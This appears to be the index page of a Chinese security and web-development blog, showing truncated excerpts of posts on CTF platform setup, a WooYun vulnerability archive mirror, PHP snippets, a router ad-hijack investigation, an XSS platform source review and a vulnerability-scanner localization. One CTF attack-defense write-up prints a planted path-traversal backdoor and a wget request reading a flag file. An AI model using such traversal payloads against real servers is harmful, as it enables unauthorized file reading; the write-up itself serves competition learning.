Ubuntu 16.04搭建适用于CTF的Docker靶场
因CTF比赛需要和设备闲置 学习搭建Docker靶场
搭建环境
OS: Ubuntu 16.04
设备类型: VM
宿主机:ESXI 6.5
开始卸载原有Docker$ apt-get remove docker \ docker-engine \ docker.io
安装Ubuntu 16.04 + 上的 Docker CE 默认使用overlay2存储层驱动,无需手动配置。
使用 APT 安装由于apt源使用 HTTPS 以确保软件下载过程中不被篡改。因此,我们首先需要添加使用 HTTPS 传输的软件包以及 CA 证书。
$ apt-get update -y && apt-get upgrade -y$ apt-get install \ apt-transport-https \ ca-certificates \ curl \ software-properties-common
鉴于国内网络问题,建议使用国内源,官方源请在注释中查看。为了确认所下载软件包的合法性,需要添加软件源的 GPG 密钥。
$ curl ...
linux安装screenfetch
screenFetch 是一个能够在截屏中显示系统/主题信息的命令行脚本。它可以在 Linux,OS X,FreeBSD 以及其它的许多类Unix系统上使用。
Ubuntu系apt-get install screenfetch
如果源里面没有这个软件,可以采用如下方法:
wget https://github.com/KittyKatt/screenFetch/archive/master.zipunzip master.zipsudo mv screenFetch-master/screenfetch-dev /usr/bin/screenfetch
如图
RHEL系如图
更新Next主题
没注意NeXT已经更新到6.5.0版本了折腾之余顺便记录下
NeXT 6系列和5系列给笔者最直观的感受是配置文件更细了,更细带来的问题是一些JS库需要自己去下载了。。
准备工作适用于从5.X升级上来的
下载cd到博客目录然后
git clone https://github.com/theme-next/hexo-theme-next themes/next-reloaded
启用在 Hexo 的主配置文件中设置主题:
theme: next-reloaded
NeXT6.X主题将在生成站点时被加载。如果你遇到了任何错误、或只是不喜欢这一新版本,你可以随时切换回旧的 v5.1.x 版本。
迁移设置正如笔者前文所述,6.X的配置文件更细了
更新语言配置从 v6.0.3版本起,zh-Hans改名为zh-CN,需要在修改HEXO配置文件_config.xml里的language配置,否则语言显示不正确。
[例子]# Hexo Configuration## Docs: https://hexo.io/docs/configuration.html## Source: https://git ...
搭建乌云漏洞库+知识库
乌云2年多了。。突发奇想在内网搭建个知识库+漏洞库
准备为了方便,我用了Windows服务器,详细配置如下
服务器配置
Windows Server 2016 DCApache 2.4.25PHP 5.6.30MySQL 5.7.17-log
所需文件下载地址
知识库:链接:https://pan.baidu.com/s/1CZVZxdHzl7L8y3dGWN-aOQ提取码:uuuo漏洞库链接:https://pan.baidu.com/s/1LGSwDmVwtlffyM8I-1hQzw提取码:8duw
步骤漏洞库
将漏洞库中的wooyun目录下所有文件移入mysql的data目录,然后查看数据库中是否存在名称为wooyun的数据库库和bugs、whitehats的数据表mysql> SHOW DATABASES;+--------------------+| Database |+--------------------+| information_schema || mysql || performance_schema | ...
校园网搭建FBCTF平台
记录下校园网内搭建FBCTF那些坑
测试通过的环境:
全新安装的Ubuntu 16.04
Ubuntu配置启用ROOT账户
使用:sudo passwd root设置root的密码
使用su root来测试是否可以进入root用户,如果出现#说明已经设置root用户的密码成功
进入到/usr/share/lightdm/lightdm.conf.d/目录,使用gedit 50-unity-greeter.conf &命令打开50-unity-greeter.conf 文件
文件末尾添加
user-session=ubuntugreeter-show-manual-login=trueallow-guest=false
保存重启
此时会出现读取/root/.profile时发现错误的对话框,点击确定按钮,进入系统,使用vi /root/.profile命令修改文件,找到mesg n,修改为:tty -s && mesg n如下图
具体参考https://blog.csdn.net/sunxiaoju/article/deta ...
原生PHP导出数据库
网上找了下相关代码基本都是有语法错误的,挑了个错误少的改了改
通过测试的环境
CentOS7.1PHP7.2.10MySQL5.7.23Apache 2.4.34
代码如下
<?phpset_time_limit(0);header("Content-type:text/html;charset=utf-8");//配置信息$cfg_dbhost = 'localhost';$cfg_dbname = '';//数据库名$cfg_dbuser = '';//数据库用户$cfg_dbpwd = '';//数据库密码$cfg_db_language = 'utf8';$to_file_name = "dbname.sql"; //你即将导出的数据库命名// END 配置//链接数据库$link = mysqli_connect($cfg_dbhost, $cfg_dbuser, $cfg_db ...
网鼎杯线下AWD【WEB】
不得不说AWD对WEB狗越来越不友好了
Down下网站源码后上Seay源代码审计工具直接自动审计一波发现预留后门
路径/sites/all/modules/avatar_uploader/lib/demo/view.php
<?php$file = $_GET['file'];echo file_get_contents("uploadDir/$file");exit;
直接构造POC:wget http://ip:5072/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../flag即可获取目标机上flag
PHP中检查会话是否过期
在做项目时遇到了一个小需求
需求大概意思是要检测当前会话是否过期,网上搜了下基本都是用cookies记录的想了下用Session也可以做
实现可以在登录时用$_SESSION['Your_Name']存储登录时的时间然后在访问后台每个页面必经的页面加入会话验证函数大概函数如下登录页在登录成功后加入:
date_default_timezone_set('Asia/Shanghai');$time = date('Y-m-d H:i:s');$_SESSION['login_time'] = $time;
函数中加入
/** * 检测会话是否过期 */function CheckSession(){ session_start(); date_default_timezone_set('Asia/Shanghai'); $session_time = $_SESSION['login_time']; $timeout = ...
斐讯路由DNS劫持
可能是太久没见广告了吧……突然间弹了个牛皮癣
起因在进行线上环境调试时习惯性的按了F12看看前端结果发现Console里有了点不该有的东西移动端访问非HTTPS网站更是直接弹了个广告PC端挂着移动端的UA一样弹广告很好 你成功的引起了我的注意
追查首先发现console里请求的JS为https://cnd.newapi.com/sdk/cnzz.js?v8和https://logs.newapi.com/jd/ad?f=zq18
ad内容解密后:
window.amb_jd_proxy_domain="logs.newapi.com";window.amb_jd_cdn_domain="cnd.newapi.com";window.amb_jd_proxy_f="zq18";window.amb_jd_proxy_c="2";window.amb_jd_cnzz_id="1274015796";window.amb_jd_tongji_url="";functio ...
XSS平台原理浅析
之前一直对XSS平台传递原理很好奇 今天抽空看了下源码
先来看index.php
index.php<?php/** * index.php 默认页 * ---------------------------------------------------------------- * OldCMS,site:http://www.oldcms.com */include('init.php');$do=Val('do','GET',0);$dos=array('index','login','project','module','code','api','do','register','user','keepsession');if(!in_array($do,$dos)) $do='index';i ...
LAMP服务器报错500调试方法
3个多月没发博文了 过一段时间把i春秋上的文章迁移下。。
最近在用PHP做课设 本地测试非常完美但是到了远程服务器就报500错误了。。查了一番资料,发现了一个万能调试代码
<?phpregister_shutdown_function( function(){ var_dump(error_get_last()); });?>
把这段直接加到出问题的主文件开头然后访问即可定位错误并解决
汉化AWVS11
AWVS11汉化包
没注意AWVS11更新了2个版本了,试了下原先汉化的那个包,大部分不能用了,重新汉化了下
界面预览登录界面
仪表盘
目标
漏洞
扫描
报告
设置
使用方法
下载
解压
复制到AWVS11的\ui\scripts目录下,覆盖原文件 [建议备份原文件]
如:AWVS11目录为C:\Program Files (x86)\Acunetix 11\则目标位置为C:\Program Files (x86)\Acunetix 11\11.0.172901635\ui\scripts
如AWVS11运行中,请强制刷新AWVS11当前页
汉化说明
全局UI界面重新做汉化,尽可能的保留原始意思
出于版权原因,漏洞说明不提供汉化
添加了github项目,使用过程中如有界面未做到汉化或更好的建议,请在本帖内反馈或到Github反馈,感谢
请勿用于非法用途,测试后请尽快删除。
附件:AWVS11.rar